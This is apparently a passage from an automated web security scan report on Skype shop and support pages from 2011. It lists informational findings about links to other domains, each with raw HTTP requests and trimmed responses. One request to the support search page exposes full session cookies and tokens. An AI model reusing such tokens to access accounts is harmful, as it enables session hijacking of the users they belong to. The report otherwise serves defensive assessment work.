<a id="skypeLogo" title="skype.com" href="http://go.skype.com/go:download">
<img width="105" height="47" alt="Skype Logo" src="https://apps.skypeassets.com/static/skype-account/logos/skype_logo.png"/>
</a>
...[SNIP]...

17.64. http://shop.skype.com/apps/Search-Results.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Search-Results.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /apps/Search-Results.html?company=NetraliaPtyLtd HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<!-- Icon -->
<link rel="icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="shortcut icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico" />
<link rel="apple-touch-icon" href="http://www.skypeassets.com/i/images/logos/skype_webclip.png" />

<!-- Default stylesheets -->
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://www.pamela.biz/getpcr.exe"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://download.pamfax.biz/PamFaxFullInstaller.exe"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://prettymay.net/PrettyMay-bas-setup.exe"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://download.pamfax.biz/PamFaxInstaller.dmg"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://www.pamela.biz/getbasic.exe"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://www.vodburner.com/affland.php?aff_id=A18"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://www.innerpass.com/home/skype.aspx"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://register.zaplee.com/trk/?src=skypeShop2"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://www.prettymay.net/PrettyMay-setup.exe"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://www.callburner.com/app-directory-download"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://www.idroo.com/"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://itunes.apple.com/us/app/qik-video/id439715497?mt=8"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://clownfish-translator.com/download.html"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="https://market.android.com/search?q=qik&so=1&c=apps&rdid=com.qik.android&rdot=1&li=1"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://www.evaer.com/get-evaer/"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://clownfish-translator.com/download.html"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://www.idroo.com/"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://www.skylook.biz/app-directory-download"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://www.callburner.com/app-directory-download"><span class="text">
...[SNIP]...
<span class="buttonSmall"><a onclick="" target="_blank" class="greenSml" href="http://register.zaplee.com/trk/?src=skypeShop2"><span class="text">
...[SNIP]...
<div id="modalPhoneCompare">
<script type="text/javascript" src="http://snippet.omm.crownpeak.com/s/178d8338-bcf1-41f0-a0f2-f3c9ca897a35"></script>
...[SNIP]...

17.65. https://support.skype.com/en-us/faq/FA10414/How-do-subscriptions-work  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA10414/How-do-subscriptions-work

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en-us/faq/FA10414/How-do-subscriptions-work?frompage=category HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:58 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 58632


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: How do subscriptions work?</title>
   <meta name="description" content="Help using Skype - FAQs, user guides, t
...[SNIP]...
<!-- Default skype.com stylesheets -->
   <link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/full.css?be621ed463e955f7478a9ac07a668975" type="text/css" media="screen"/>

   
<!-- Unified Header and Footer CSS -->
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</h3>
           <img src="https://secure.skypeassets.com/content/dam/skype/images/support/sidebar/group_video.png" alt="Skype Premium"/>
           <p>
...[SNIP]...

17.66. https://support.skype.com/en-us/faq/FA10416/Why-isn-t-my-subscription-working  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA10416/Why-isn-t-my-subscription-working

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en-us/faq/FA10416/Why-isn-t-my-subscription-working?frompage=category HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:01 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 58129


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: Why isn&#039;t my subscription working?</title>
   <meta name="description" content="Help using Skype - FAQs, u
...[SNIP]...
<!-- Default skype.com stylesheets -->
   <link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/full.css?be621ed463e955f7478a9ac07a668975" type="text/css" media="screen"/>

   
<!-- Unified Header and Footer CSS -->
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</h3>
           <img src="https://secure.skypeassets.com/content/dam/skype/images/support/sidebar/group_video.png" alt="Skype Premium"/>
           <p>
...[SNIP]...

17.67. https://support.skype.com/en-us/faq/FA109/I-ve-forgotten-my-password  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA109/I-ve-forgotten-my-password

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en-us/faq/FA109/I-ve-forgotten-my-password?frompage=category HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:43 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 55107


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: I...ve forgotten my password...</title>
   <meta name="description" content="Help using Skype - FAQs, user guid
...[SNIP]...
<!-- Default skype.com stylesheets -->
   <link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/full.css?be621ed463e955f7478a9ac07a668975" type="text/css" media="screen"/>

   
<!-- Unified Header and Footer CSS -->
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</h3>
           <img src="https://secure.skypeassets.com/content/dam/skype/images/support/sidebar/group_video.png" alt="Skype Premium"/>
           <p>
...[SNIP]...

17.68. https://support.skype.com/en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook?frompage=category HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:57 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 54830


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: Can I make video calls on Facebook?</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
<!-- Default skype.com stylesheets -->
   <link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/full.css?be621ed463e955f7478a9ac07a668975" type="text/css" media="screen"/>

   
<!-- Unified Header and Footer CSS -->
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</h3>
           <img src="https://secure.skypeassets.com/content/dam/skype/images/support/sidebar/group_video.png" alt="Skype Premium"/>
           <p>
...[SNIP]...

17.69. https://support.skype.com/en-us/faq/FA140/How-can-I-change-my-privacy-settings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA140/How-can-I-change-my-privacy-settings

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en-us/faq/FA140/How-can-I-change-my-privacy-settings?frompage=category HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:55 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 54416


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: How can I change my privacy settings?</title>
   <meta name="description" content="Help using Skype - FAQs, use
...[SNIP]...
<!-- Default skype.com stylesheets -->
   <link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/full.css?be621ed463e955f7478a9ac07a668975" type="text/css" media="screen"/>

   
<!-- Unified Header and Footer CSS -->
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</h3>
           <img src="https://secure.skypeassets.com/content/dam/skype/images/support/sidebar/group_video.png" alt="Skype Premium"/>
           <p>
...[SNIP]...

17.70. https://support.skype.com/en-us/faq/FA331/What-is-an-Online-Number  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA331/What-is-an-Online-Number

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en-us/faq/FA331/What-is-an-Online-Number?frompage=category HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:17 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52452


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: What is an Online Number?</title>
   <meta name="description" content="Help using Skype - FAQs, user guides, tr
...[SNIP]...
<!-- Default skype.com stylesheets -->
   <link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/full.css?be621ed463e955f7478a9ac07a668975" type="text/css" media="screen"/>

   
<!-- Unified Header and Footer CSS -->
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</h3>
           <img src="https://secure.skypeassets.com/content/dam/skype/images/support/sidebar/group_video.png" alt="Skype Premium"/>
           <p>
...[SNIP]...

17.71. https://support.skype.com/en-us/faq/FA351/How-can-I-pay-for-Skype-products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA351/How-can-I-pay-for-Skype-products

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en-us/faq/FA351/How-can-I-pay-for-Skype-products?frompage=category HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:00 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52523


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: How can I pay for Skype products?</title>
   <meta name="description" content="Help using Skype - FAQs, user gu
...[SNIP]...
<!-- Default skype.com stylesheets -->
   <link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/full.css?be621ed463e955f7478a9ac07a668975" type="text/css" media="screen"/>

   
<!-- Unified Header and Footer CSS -->
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</h3>
           <img src="https://secure.skypeassets.com/content/dam/skype/images/support/sidebar/group_video.png" alt="Skype Premium"/>
           <p>
...[SNIP]...

17.72. https://support.skype.com/en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype?frompage=category HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:24 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53765


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: Why can&#039;t I sign in to Skype?</title>
   <meta name="description" content="Help using Skype - FAQs, user g
...[SNIP]...
<!-- Default skype.com stylesheets -->
   <link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/full.css?be621ed463e955f7478a9ac07a668975" type="text/css" media="screen"/>

   
<!-- Unified Header and Footer CSS -->
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</h3>
           <img src="https://secure.skypeassets.com/content/dam/skype/images/support/sidebar/group_video.png" alt="Skype Premium"/>
           <p>
...[SNIP]...

17.73. https://support.skype.com/en/faq/FA10673/What-is-Skype-Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faq/FA10673/What-is-Skype-Home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en/faq/FA10673/What-is-Skype-Home?fromSearchFirstPage=false HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:33 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52104


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype: What is Skype Home?</title>
   <meta name="description" content="Help using Skype - FAQs, user guides, troubleshoo
...[SNIP]...
<!-- Default skype.com stylesheets -->
   <link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/full.css?be621ed463e955f7478a9ac07a668975" type="text/css" media="screen"/>

   
<!-- Unified Header and Footer CSS -->
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</h3>
           <img src="https://secure.skypeassets.com/content/dam/skype/images/support/sidebar/group_video.png" alt="Skype Premium"/>
           <p>
...[SNIP]...

17.74. https://support.skype.com/en/faq/FA109/I-ve-forgotten-my-password  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faq/FA109/I-ve-forgotten-my-password

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en/faq/FA109/I-ve-forgotten-my-password?fromSearchFirstPage=false HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:16 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 54142


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype: I...ve forgotten my password...</title>
   <meta name="description" content="Help using Skype - FAQs, user guides,
...[SNIP]...
<!-- Default skype.com stylesheets -->
   <link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/full.css?be621ed463e955f7478a9ac07a668975" type="text/css" media="screen"/>

   
<!-- Unified Header and Footer CSS -->
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</h3>
           <img src="https://secure.skypeassets.com/content/dam/skype/images/support/sidebar/group_video.png" alt="Skype Premium"/>
           <p>
...[SNIP]...

17.75. https://support.skype.com/en/faq/FA1170/How-can-I-contact-Skype-Customer-Service  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faq/FA1170/How-can-I-contact-Skype-Customer-Service

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en/faq/FA1170/How-can-I-contact-Skype-Customer-Service?fromSearchFirstPage=false HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:19 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51161


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype: How can I contact Skype Customer Service?</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
<!-- Default skype.com stylesheets -->
   <link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/full.css?be621ed463e955f7478a9ac07a668975" type="text/css" media="screen"/>

   
<!-- Unified Header and Footer CSS -->
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</h3>
           <img src="https://secure.skypeassets.com/content/dam/skype/images/support/sidebar/group_video.png" alt="Skype Premium"/>
           <p>
...[SNIP]...

17.76. https://support.skype.com/en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile?fromSearchFirstPage=false HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:31 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52675


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype: How do I change my email address, or add another email address to my profile?</title>
   <meta name="description"
...[SNIP]...
<!-- Default skype.com stylesheets -->
   <link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/full.css?be621ed463e955f7478a9ac07a668975" type="text/css" media="screen"/>

   
<!-- Unified Header and Footer CSS -->
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</h3>
           <img src="https://secure.skypeassets.com/content/dam/skype/images/support/sidebar/group_video.png" alt="Skype Premium"/>
           <p>
...[SNIP]...

17.77. https://support.skype.com/en/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en/search?q=xss HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://support.skype.com/en/faq/FA10184/How-do-I-create-a-Skype-account
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: support.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; JSESSIONID=C51B9013C862C1913F4926F5DFFB3B93; skypeSessionId=C51B9013C862C1913F4926F5DFFB3B93

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:08:16 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Content-Length: 42545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lan
...[SNIP]...
<!-- Unified Header and Footer CSS -->


               <link rel="stylesheet" href="https://secure.skypeassets.com//i/css/turbo/buttons.css" type="text/css" media="screen, print"/>
       <link rel="stylesheet" href="https://secure.skypeassets.com//i/css/turbo/grid.css" type="text/css" media="screen, print"/>
       <link rel="stylesheet" href="https://secure.skypeassets.com//i/css/turbo/navigation.css" type="text/css" media="screen"/>


<!-- Default stylesheets -->
...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

17.78. https://support.skype.com/faqView.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /faqView.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /faqView.do?id=FA10184&title=How-do-I-create-a-Skype-account& HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:37:09 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 12438


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
